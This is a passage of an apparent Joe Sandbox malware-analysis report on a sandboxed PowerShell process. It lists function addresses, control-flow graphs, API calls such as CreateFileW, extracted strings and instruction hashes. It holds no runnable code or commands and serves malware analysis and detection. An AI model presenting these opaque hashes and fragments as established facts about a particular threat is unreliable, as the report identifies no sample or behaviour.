7ff887a1bdeb-7ff887a1be5c call 7ff887a16dd8 299->301 302 7ff887a1be72-7ff887a1be9e 299->302 338 7ff887a1be5e-7ff887a1be6b 301->338 339 7ff887a1be71 301->339 303 7ff887a1bf58-7ff887a1bf98 302->303 304 7ff887a1bea4-7ff887a1bf51 call 7ff887a16d88 302->304 314 7ff887a1c089-7ff887a1c097 call 7ff887a1c12e 303->314 315 7ff887a1bf9e-7ff887a1bfac 303->315 304->303 328 7ff887a1c099-7ff887a1c0a7 314->328 329 7ff887a1c0aa-7ff887a1c0b5 314->329 317 7ff887a1c041-7ff887a1c067 315->317 318 7ff887a1bfb2-7ff887a1bfbd 315->318 326 7ff887a1c06c-7ff887a1c06f 317->326 331 7ff887a1c071-7ff887a1c081 326->331 332 7ff887a1c082-7ff887a1c086 326->332 328->329 334 7ff887a1c11b-7ff887a1c12d 329->334 335 7ff887a1c0b7-7ff887a1c0fb call 7ff887a12ed8 329->335 331->332 332->314 335->334 338->339 339->302
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4b$b4b$d$hL_H
                                    • API String ID: 0-1639147439
                                    • Opcode ID: 5317a98e6b58dc11bd7ae873a2b93ce60c746cef2d4e4bf35a485b5db6ff8496
                                    • Instruction ID: 3e1bd150d2c2c77fa960364badb1a01a896ff0af7833e98044cc443c203ab205
                                    • Opcode Fuzzy Hash: 5317a98e6b58dc11bd7ae873a2b93ce60c746cef2d4e4bf35a485b5db6ff8496
                                    • Instruction Fuzzy Hash: 46827531A5CA4A8FE359DB2884526B9B7F1FF99354B1441BEC04FC72E3DE28A842C751
                                    Function 00007FF887A2CEA0 Relevance: 4.6, Strings: 3, Instructions: 836COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 347 7ff887a2cea0-7ff887a2cee1 call 7ff887a1df68 351 7ff887a2cee3-7ff887a2cef3 347->351 352 7ff887a2cef5-7ff887a2cf00 347->352 351->352 353 7ff887a2d243-7ff887a2d246 352->353 354 7ff887a2cf06-7ff887a2cf0a 352->354 355 7ff887a2d248-7ff887a2d25a call 7ff887a1dd38 353->355 356 7ff887a2d25c-7ff887a2d26f 353->356 358 7ff887a2cf1b-7ff887a2cf23 354->358 359 7ff887a2cf0c-7ff887a2cf11 354->359 355->356 360 7ff887a2cf29-7ff887a2cf46 358->360 361 7ff887a2d293-7ff887a2d2a9 358->361 359->358 365 7ff887a2cf4c-7ff887a2cfc0 call 7ff887a1df00 360->365 366 7ff887a2d121-7ff887a2d136 360->366 369 7ff887a2d2ab-7ff887a2d2b2 361->369 370 7ff887a2d2b3-7ff887a2d2bd 361->370 407 7ff887a2cfe8 365->407 408 7ff887a2cfc2-7ff887a2cfc3 365->408 375 7ff887a2d138-7ff887a2d13e 366->375 376 7ff887a2d1b3-7ff887a2d1be 366->376 369->370 373 7ff887a2d2be 370->373 374 7ff887a2d2bf-7ff887a2d2f8 370->374 373->374 390 7ff887a2d2fa-7ff887a2d30f 374->390 391 7ff887a2d312-7ff887a2d350 374->391 381 7ff887a2d152-7ff887a2d161 call 7ff887a1df78 375->381 382 7ff887a2d140-7ff887a2d150 375->382 379 7ff887a2d1cf-7ff887a2d1d6 376->379 380 7ff887a2d1c0-7ff887a2d1c5 376->380 379->361 383 7ff887a2d1dc-7ff887a2d204 379->383 380->379 393 7ff887a2d165-7ff887a2d171 381->393 382->381 397 7ff887a2d270-7ff887a2d292 383->397 398 7ff887a2d205-7ff887a2d21c call 7ff887a1dfe8 383->398 390->391 418 7ff887a2d50a-7ff887a2d532 391->418 419 7ff887a2d356-7ff887a2d379 391->419 393->354 394 7ff887a2d177 393->394 394->353 397->361 405 7ff887a2d21e-7ff887a2d22d call 7ff887a1dfd0 398->405 406 7ff887a2d232-7ff887a2d241 call 7ff887a1df38 398->406 405->406 406->353 411 7ff887a2cfea-7ff887a2d003 407->411 414 7ff887a2cfc7-7ff887a2cfd7 408->414 423 7ff887a2d025-7ff887a2d028 411->423 424 7ff887a2d005-7ff887a2d020 call 7ff887a1df70 411->424 420 7ff887a2cfd9-7ff887a2cfe0 414->420 421 7ff887a2cfe6 414->421 442 7ff887a2d5a6-7ff887a2d5b4 418->442 443 7ff887a2d534-7ff887a2d587 418->443 440 7ff887a2d4e9-7ff887a2d504 419->440 441 7ff887a2d37f-7ff887a2d39d 419->441 420->414 422 7ff887a2cfe2-7ff887a2cfe4 420->422 421->411 422->421 426 7ff887a2d02a-7ff887a2d044 423->426 427 7ff887a2d0a3-7ff887a2d0ab 423->427 424->423 437 7ff887a2d069-7ff887a2d06e 426->437 438 7ff887a2d046-7ff887a2d062 426->438 431 7ff887a2d0b9-7ff887a2d0ca call 7ff887a1df60 427->431 432 7ff887a2d0ad-7ff887a2d0b7 call 7ff887a26e80 427->432 447 7ff887a2d0fa-7ff887a2d10c call 7ff887a1df90 431->447 448 7ff887a2d0cc-7ff887a2d0e6 431->448 432->431 446 7ff887a2d110-7ff887a2d11d 432->446 437->427 455 7ff887a2d070-7ff887a2d082 438->455 456 7ff887a2d064-7ff887a2d067 438->456 440->418 440->419 441->440 466 7ff887a2d3a3-7ff887a2d3ae 441->466 443->442 478 7ff887a2d589-7ff887a2d5a4 443->478 446->393 465 7ff887a2d11f-7ff887a2d199 446->465 447->446 460 7ff887a2d17c-7ff887a2d181 448->460 461 7ff887a2d0ec-7ff887a2d0f8 448->461 462 7ff887a2d084-7ff887a2d09d 455->462 456->462 460->353 461->446 462->397 462->427 465->398 472 7ff887a2d19b-7ff887a2d1a6 call 7ff887a1df58 465->472 473 7ff887a2d3b0-7ff887a2d3ff 466->473 474 7ff887a2d401-7ff887a2d40e 466->474 479 7ff887a2d1ab-7ff887a2d1ae 472->479 473->474 483 7ff887a2d44b-7ff887a2d48e 474->483 484 7ff887a2d410-7ff887a2d449 474->484 478->442 479->353 493 7ff887a2d4e0-7ff887a2d4e8 call 7ff887a2d5b5 483->493 494 7ff887a2d490-7ff887a2d4b8 483->494 484->483 493->440 501 7ff887a2d4ba-7ff887a2d4bf 494->501 502 7ff887a2d4c6-7ff887a2d4de 494->502 501->502 502->493 502->494
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0#l$mK_H$/b
                                    • API String ID: 0-805430417
                                    • Opcode ID: 1f743641673d6ceefee0e05a635a6225005db3b70a05c08601e664b20ecfaef0
                                    • Instruction ID: 1eaa39d50522d98894d6c5253bcd4062f8427f0587509660438c6d1c0e17f34b
                                    • Opcode Fuzzy Hash: 1f743641673d6ceefee0e05a635a6225005db3b70a05c08601e664b20ecfaef0
                                    • Instruction Fuzzy Hash: 81428131A6CA498FEB98EB2C9455AB977F1FF98380F0401B9E44EC7296DE64EC41C741
                                    Function 00007FF887A1BA99 Relevance: 1.8, Strings: 1, Instructions: 538COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: hL_H
                                    • API String ID: 0-3815963757
                                    • Opcode ID: 58b7ee3470862f7e103aadd2f98d8083278322030865682069491e196e3037b5
                                    • Instruction ID: 5fa5f0093f45e8b726b92a39d170c2f3c3e6fd17c39b488f0e93892dfdf1e82c
                                    • Opcode Fuzzy Hash: 58b7ee3470862f7e103aadd2f98d8083278322030865682069491e196e3037b5
                                    • Instruction Fuzzy Hash: 91F10731E5CA8A8FF789DB3884157B977E2FFA9344B1441B9C04EC72E6DE289842C751
                                    Function 00007FF887A1C6F9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 230COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: p[d
                                    • API String ID: 0-894752823
                                    • Opcode ID: 3d52418637921df1031ae5d4f91c0d7cd97605e0da7951224bc8002f0838abd1
                                    • Instruction ID: bda8f262bc1093a2f5928835884e772b01b290c50eea3aacb6b160fa5dcac19c
                                    • Opcode Fuzzy Hash: 3d52418637921df1031ae5d4f91c0d7cd97605e0da7951224bc8002f0838abd1
                                    • Instruction Fuzzy Hash: 5B61D47190CA494FE758DB6C985A6BD7BF1FF59350F04427FD04AD3292DB28A802CB91
                                    Function 00007FF887A1C809 Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 742 7ff887a1c809-7ff887a1c873 747 7ff887a1c87d-7ff887a1c8dc CreateFileW 742->747 748 7ff887a1c875-7ff887a1c87a 742->748 749 7ff887a1c8de 747->749 750 7ff887a1c8e4-7ff887a1c90c 747->750 748->747 749->750
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: b68b74f7807a3e4775cb498874ce69d068c9463cc2c3e6f758f806c8c38b3982
                                    • Instruction ID: 144d2675499c59094e6ba7562dc606cbde319a6808a7c5ead54d8242cda6f069
                                    • Opcode Fuzzy Hash: b68b74f7807a3e4775cb498874ce69d068c9463cc2c3e6f758f806c8c38b3982
                                    • Instruction Fuzzy Hash: D2319E3191CA5C8FDB58EF5CD846AED7BE0FB69321F14422EE04AD3251CB75A811CB81
                                    Function 00007FF887A145DA Relevance: 1.6, APIs: 1, Instructions: 130fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 732 7ff887a145da-7ff887a1c873 737 7ff887a1c87d-7ff887a1c8dc CreateFileW 732->737 738 7ff887a1c875-7ff887a1c87a 732->738 739 7ff887a1c8de 737->739 740 7ff887a1c8e4-7ff887a1c90c 737->740 738->737 739->740
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: bc81e7bd8c0c2e2a63dea470e95ada9b3898aaa1ad4da9dad9f67a33a788e29d
                                    • Instruction ID: bd12e09295a6d2abde54c73029925758bf1687c3e40d5d56d98f189f984b7237
                                    • Opcode Fuzzy Hash: bc81e7bd8c0c2e2a63dea470e95ada9b3898aaa1ad4da9dad9f67a33a788e29d
                                    • Instruction Fuzzy Hash: 4831813191CA1C9FDB58EF58D846AFD77E0FB69311F14422EE04AD3251CB75A8118B85
                                    Function 00007FF887A145EA Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 752 7ff887a145ea-7ff887a5f2e2 GetFileType 756 7ff887a5f2ea-7ff887a5f30f 752->756 757 7ff887a5f2e4 752->757 757->756
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID: FileType
                                    • String ID:
                                    • API String ID: 3081899298-0
                                    • Opcode ID: 941e3f658bf5eeeec5a640e73fdd851befc48c14292b6235c50d0f088f4aabb8
                                    • Instruction ID: d89c42106c3fd62b5cd1f2d569a356c45e7e168f01a35e9c6bcf4f6f564c6669
                                    • Opcode Fuzzy Hash: 941e3f658bf5eeeec5a640e73fdd851befc48c14292b6235c50d0f088f4aabb8
                                    • Instruction Fuzzy Hash: F8218E70A08A0C9FDB58DB98C84ABFDB7E1FB59321F10422ED04AD3651DB75A816CB91
                                    Function 00007FF887AE055D Relevance: .7, Instructions: 680COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1467405757.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887ae0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d816a01862ef5273282b09f78b6fd31efb6f73d5b5bddaa154a460c71cba8416
                                    • Instruction ID: 389a993cac124a066dc071fe02b762355cf3f5264069914659e11d274ba3f7c8
                                    • Opcode Fuzzy Hash: d816a01862ef5273282b09f78b6fd31efb6f73d5b5bddaa154a460c71cba8416
                                    • Instruction Fuzzy Hash: 6422246294EBCA5FE356873858A617E7FF0FF52260B2901FBC09DC7193DA185806C792

                                    Non-executed Functions

                                    Function 00007FF887A1E318 Relevance: 22.1, Strings: 17, Instructions: 856COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +$EI_H$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$b4b$m
                                    • API String ID: 0-3261580099
                                    • Opcode ID: df1fb2eb07000575ed0060b286eedd2675a9742d9425b5196692c3eb3b51a1e6
                                    • Instruction ID: 55ed371e4bda8ae19a139407dd4d938533eba8138197eea40be562a8eadb966f
                                    • Opcode Fuzzy Hash: df1fb2eb07000575ed0060b286eedd2675a9742d9425b5196692c3eb3b51a1e6
                                    • Instruction Fuzzy Hash: AE629B71E58A4A8FE799DF58D4557A9B7F1FB98340F1002FDE04DD3292CE396A818B02
                                    Function 00007FF887A1DFE0 Relevance: 15.3, Strings: 11, Instructions: 1546COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: }d$ }d$ }d$0#l$0#l$0Xl$0Xl$Xkh$Xkh$x!l$x!l
                                    • API String ID: 0-3015425886
                                    • Opcode ID: 1f9c47be262496f53687fbe6947a62a8dd4868110b45cf93a0023d23380dfdc6
                                    • Instruction ID: 5f2f36346560b37037392a552e7341f9ee460e7c66bcd93eb8509ddd050dda3a
                                    • Opcode Fuzzy Hash: 1f9c47be262496f53687fbe6947a62a8dd4868110b45cf93a0023d23380dfdc6
                                    • Instruction Fuzzy Hash: 58A2E831A9C9468FEB98DB2C845AA7877F2FF64340B5501BDD00ED72A2DE26EC52C741
                                    Function 00007FF887A1EAAB Relevance: 3.3, Strings: 2, Instructions: 780COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: K_I$sJ_^
                                    • API String ID: 0-2135094936
                                    • Opcode ID: 647b1db920a6ad94d1bf99a22fa7318189ce4d0e352c814360eb7257f68ec029
                                    • Instruction ID: 561eaaa91ac0904f2e3ee9078fff17d12704928edda018967083cd8e245ac645
                                    • Opcode Fuzzy Hash: 647b1db920a6ad94d1bf99a22fa7318189ce4d0e352c814360eb7257f68ec029
                                    • Instruction Fuzzy Hash: CD32E831A9CA464BE75CEB2C94566BA73E1FF94380F5445BED04EC72C3DE29A842C781
                                    Function 00007FF887A3D3E0 Relevance: 1.9, Strings: 1, Instructions: 639COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1466752188.00007FF887A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887a10000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: gJ_H
                                    • API String ID: 0-3214708873
                                    • Opcode ID: ff1803591ff55c5dc5382dabb6dab249f9804e468ba86fdacfab85aa2a64a8c4
                                    • Instruction ID: 4970914160cb35e3e6534520a3169d26da82c3618af0664fcaef08326a11201f
                                    • Opcode Fuzzy Hash: ff1803591ff55c5dc5382dabb6dab249f9804e468ba86fdacfab85aa2a64a8c4
                                    • Instruction Fuzzy Hash: AD126170A5CB468FE7A8DF1894467BAB3E1FB98751F10467ED08DC3291DE35A842C782
                                    Function 00007FF887AE0F6D Relevance: .2, Instructions: 158COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1467405757.00007FF887AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_7ff887ae0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 50b27a01b8d392797064ee7cc35a6dc4de5925ea4d4139e221c1972a862decc5
                                    • Instruction ID: a830de31f2120d89332f34e8d3dc8b893f65edfe919bd66ac7c463c654b75e40
                                    • Opcode Fuzzy Hash: 50b27a01b8d392797064ee7cc35a6dc4de5925ea4d4139e221c1972a862decc5
                                    • Instruction Fuzzy Hash: 8A418213E8DBD64FE3A6873858961AD6FF1FF52690B2900FAC099CB1D3D90C5856C352